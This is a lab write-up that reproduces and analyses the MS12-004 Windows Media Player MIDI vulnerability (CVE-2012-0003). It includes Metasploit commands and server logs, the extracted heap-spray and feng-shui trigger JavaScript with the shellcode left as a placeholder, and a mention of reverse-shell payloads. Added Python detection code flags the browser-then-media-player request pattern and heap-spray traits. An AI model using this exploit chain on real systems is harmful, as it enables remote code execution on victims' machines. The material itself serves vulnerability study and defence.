https://cve.mitre.org: Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability."
02-Test environment
Target system: Windows XP SP3 (virtual machine)
OllyDbg: dynamic debugging
IDA Pro: static analysis
IExplore 6, Media Player: the vulnerable software
Metasploit: reproducing and exploiting the vulnerability
Auxiliary tools: wget (saves the .mid file locally), gflags.exe (enables/disables page heap, hpa)
03-Reproducing the vulnerability
Generating the malicious file with msf
# Search for the module and select it
msf5 > search cve-2012-0003
msf5 > use exploit/windows/browser/ms12_004_midi
# Set the payload
msf5 exploit(windows/browser/ms12_004_midi) > set payload windows/exec
# Set the payload parameter so that a calculator pops up (the exploit module's own options can stay at their defaults)
msf5 exploit(windows/browser/ms12_004_midi) > set cmd calc.exe
# Attack: start the server and wait for the target to connect
msf5 exploit(windows/browser/ms12_004_midi) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/browser/ms12_004_midi) >
[*] Using URL: http://0.0.0.0:8080/uMMCLOKsr
[*] Local IP: http://127.0.0.1:8080/uMMCLOKsr
[*] Server started.
Opening this malicious URL with IE on the XP target pops up the calculator.
Note: if page heap is enabled for IE on the target, IE shows an error dialog instead and the calculator does not pop up (page heap is off by default).
msf logs the corresponding records as well:
[*] 192.168.156.151 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.156.151 ms12_004_midi - Sending html to 192.168.156.151:1184...
[*] 192.168.156.151 ms12_004_midi - Request as: Windows-Media-Player/9.00.00.4503
[*] 192.168.156.151 ms12_004_midi - Sending midi corruption file...
PS: the payload can also be set to the much more capable meterpreter to obtain a reverse shell.
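The msf log above shows the server-side view of the attack: the same client first requests the URL as "Mozilla/4.0 (... MSIE 6.0 ...)" and receives HTML, then requests the very same URL as "Windows-Media-Player/9.00.00.4503" and receives the crafted MIDI. Seen from a web proxy, that is a detectable sequence. The following is an added detection example, not code from this writeup or from Metasploit; the proxy log format, the server address 192.168.156.130, the hostnames and the timestamps are constructed, and the 30-second window is an assumption.

```python
"""Flag the browser-then-media-player pattern from the Metasploit log: one client
fetches a URL with a browser User-Agent and, seconds later, fetches the SAME URL
with a Windows-Media-Player User-Agent. Added example; log format is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed proxy log: ISO timestamp, client IP, method, URL, quoted User-Agent.
# The first two lines mirror the page's msf log (client 192.168.156.151, path
# /uMMCLOKsr); the server address 192.168.156.130 is a placeholder.
SAMPLE_LOG = """\
2012-01-15T10:02:11 192.168.156.151 GET http://192.168.156.130:8080/uMMCLOKsr "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2012-01-15T10:02:12 192.168.156.151 GET http://192.168.156.130:8080/uMMCLOKsr "Windows-Media-Player/9.00.00.4503"
2012-01-15T10:05:40 192.168.156.152 GET http://intranet.example/news.html "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2012-01-15T10:05:41 192.168.156.152 GET http://intranet.example/jingle.mid "Windows-Media-Player/9.00.00.4503"
2012-01-15T11:00:00 192.168.156.153 GET http://intranet.example/music/song.mid "Windows-Media-Player/9.00.00.4503"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def parse_log(text):
    """Parse the constructed format into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, method, url, ua = m.groups()
        records.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
                        "client": client, "method": method, "url": url, "ua": ua})
    return records


def detect_ua_switch(text, window_seconds=30):
    """Return alerts for media-player fetches that follow a browser fetch by the
    same client within the window. 'same_url' (the exact URL the browser just
    loaded is re-requested by the player, i.e. one URL serves both HTML and
    media depending on the User-Agent) is the strong signal; 'same_host' (the
    player pulls a different path from the host the browser visited) is weak,
    because an ordinary page with embedded background music looks the same."""
    window = timedelta(seconds=window_seconds)
    browser_hits = defaultdict(list)      # client -> [(ts, url)] of browser fetches
    alerts = []
    for rec in sorted(parse_log(text), key=lambda r: r["ts"]):
        if rec["ua"].startswith("Mozilla/"):
            browser_hits[rec["client"]].append((rec["ts"], rec["url"]))
            continue
        if not rec["ua"].startswith("Windows-Media-Player/"):
            continue
        host = urlsplit(rec["url"]).netloc
        kind, delta = None, None
        for ts, url in browser_hits[rec["client"]]:
            gap = rec["ts"] - ts
            if gap < timedelta(0) or gap > window:
                continue
            if url == rec["url"]:
                kind, delta = "same_url", gap
                break                      # strongest match, stop looking
            if kind is None and urlsplit(url).netloc == host:
                kind, delta = "same_host", gap
        if kind:
            alerts.append({"client": rec["client"], "url": rec["url"],
                           "kind": kind, "delta_s": delta.total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in detect_ua_switch(SAMPLE_LOG):
        print(alert)
```

On the constructed log the first client produces a "same_url" alert (the /uMMCLOKsr sequence from the page), the second only a weak "same_host" alert, and the third, a media player fetching a .mid with no preceding browser activity, nothing at all. Tuning the window and deciding whether "same_host" is worth surfacing depends on how much embedded media traffic the environment normally carries.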
04-Preparation
4.1-Extracting the sample
With page heap off, the calculator pops up but the IE window closes immediately, leaving no time to extract the HTML.
So enable page heap first, so that IE shows an error dialog instead of closing.
C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe -i IExplore.exe +hpa
Current Registry Settings for IExplore.exe executable are: 02000000
hpa - Enable page heap
// Part 1: the heap spray
<script language='javascript'>
    var heap_obj = new heapLib.ie(0x10000);
    var code = unescape("xxxxxxxxxxxxxxxx");   // shellcode replaced by a placeholder in the writeup
    var ORF = "%u0c0c%u0c0c";
    var nops = unescape(ORF);
    while (nops.length < 0x1000) nops += nops;
    var shellcode = nops.substring(0, 0x800 - code.length) + code;
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000 - 6) / 2);
    heap_obj.gc();
    for (var i = 0; i < 600; i++) {
        heap_obj.alloc(block);
    }
</script>
// Part 2: the key part of the exploit
<script language='javascript'>
    var heap = new heapLib.ie();
    var selob = document.createElement("select");
    selob.w0 = unescape("%u0c0c%u0c0c");
    selob.w1 = alert;
    ...
    selob.w55 = alert;
    var clones = new Array(1000);
    function feng_shui() {
        var i = 0;
        while (i < 1000) {
            clones[i] = selob.cloneNode(true);
            i = i + 1;
        }
        var j = 0;
        while (j < 1000) {
            delete clones[j];
            CollectGarbage();
            j = j + 2;
        }
    }
    feng_shui();
    function trigger() {
        var k = 999;
        while (k > 0) {
            if (typeof(clones[k].w0) == "string") {
            } else {
                clones[k].w0('come on!');
            }
            k = k - 2;
        }
        feng_shui();
        document.audio.Play();
    }
</script>
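The extracted HTML above carries the textbook heap-spray signature: a single 16-bit unit repeated through unescape(), a string that doubles itself in a loop until it reaches a fixed size, a loop that allocates hundreds of identical blocks, heapLib, and explicit CollectGarbage() calls. Those are the features a content scanner or a web-proxy rule looks for. The following is an added detection example, not code from this writeup or from Metasploit; the indicator names, regular expressions and the "three indicators" threshold are my own choices, and the sample is a copy of the spray block above with a trimmed excerpt of the trigger block.

```python
"""Static heap-spray indicators, run over the spray block shown above.
Added detection example; indicator names and thresholds are assumptions."""
import re

# Constructed sample: the page's spray block (shellcode placeholder kept) plus a
# trimmed excerpt of the trigger block; the full w1..w55 property list is omitted.
SPRAY_SAMPLE = """
<script language='javascript'>
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("xxxxxxxxxxxxxxxx");
var ORF = "%u0c0c%u0c0c";
var nops = unescape(ORF);
while (nops.length < 0x1000) nops+= nops;
var shellcode = nops.substring(0,0x800 - code.length) + code;
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=0; i < 600; i++) {
heap_obj.alloc(block);
}
var selob = document.createElement("select");
selob.w0 = unescape("%u0c0c%u0c0c");
var clones = new Array(1000);
delete clones[0];
CollectGarbage();
</script>
"""

# Constructed benign page: one unescape() of a non-repeating string, no loops.
BENIGN_SAMPLE = """<script>document.title = unescape("%u4F60%u597D");</script>"""

STRING_VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"')
UNESCAPE_RE = re.compile(r'unescape\(\s*(?:"([^"]*)"|(\w+))\s*\)')
DOUBLING_RE = re.compile(
    r'while\s*\(\s*(\w+)\.length\s*<\s*(?:0x[0-9a-fA-F]+|\d+)\s*\)\s*\1\s*\+=\s*\1')
ALLOC_LOOP_RE = re.compile(r'for\s*\(([^)]*)\)\s*\{?\s*\w+\.alloc\(')


def find_indicators(html):
    """Return {indicator_name: detail} for each heap-spray indicator present."""
    found = {}
    literals = dict(STRING_VAR_RE.findall(html))   # resolve unescape(var) one level
    for m in UNESCAPE_RE.finditer(html):
        arg = m.group(1) if m.group(1) is not None else literals.get(m.group(2), "")
        units = re.findall(r'%u([0-9a-fA-F]{4})', arg)
        # one 16-bit unit repeated is the classic sled / fake-pointer fill
        if len(units) >= 2 and len({u.lower() for u in units}) == 1:
            found["repeated_unescape_unit"] = "%u" + units[0].lower()
            break
    m = DOUBLING_RE.search(html)
    if m:
        found["self_doubling_loop"] = m.group(1)
    m = ALLOC_LOOP_RE.search(html)
    if m:
        bound = re.search(r'<\s*(\d+)', m.group(1))
        found["alloc_loop_count"] = int(bound.group(1)) if bound else -1
    if "heapLib." in html:
        found["heaplib_usage"] = True
    if "CollectGarbage()" in html:
        found["explicit_gc"] = True
    return found


def is_spray_suspect(html, min_indicators=3):
    """Rule: a repeated-unit fill or a self-doubling loop, plus enough other hints."""
    ind = find_indicators(html)
    core = "repeated_unescape_unit" in ind or "self_doubling_loop" in ind
    return core and len(ind) >= min_indicators


if __name__ == "__main__":
    print(find_indicators(SPRAY_SAMPLE))
    print("spray sample suspect:", is_spray_suspect(SPRAY_SAMPLE))
    print("benign sample suspect:", is_spray_suspect(BENIGN_SAMPLE))
```

Resolving unescape(ORF) through the preceding var assignment matters: the sample on this page never passes the repeated unit to unescape() as a literal, so a scanner that only inspects literals misses it. Obfuscated pages will defeat regular expressions like these quickly; the value of the heuristic is in triage of captured pages, not as a sole control.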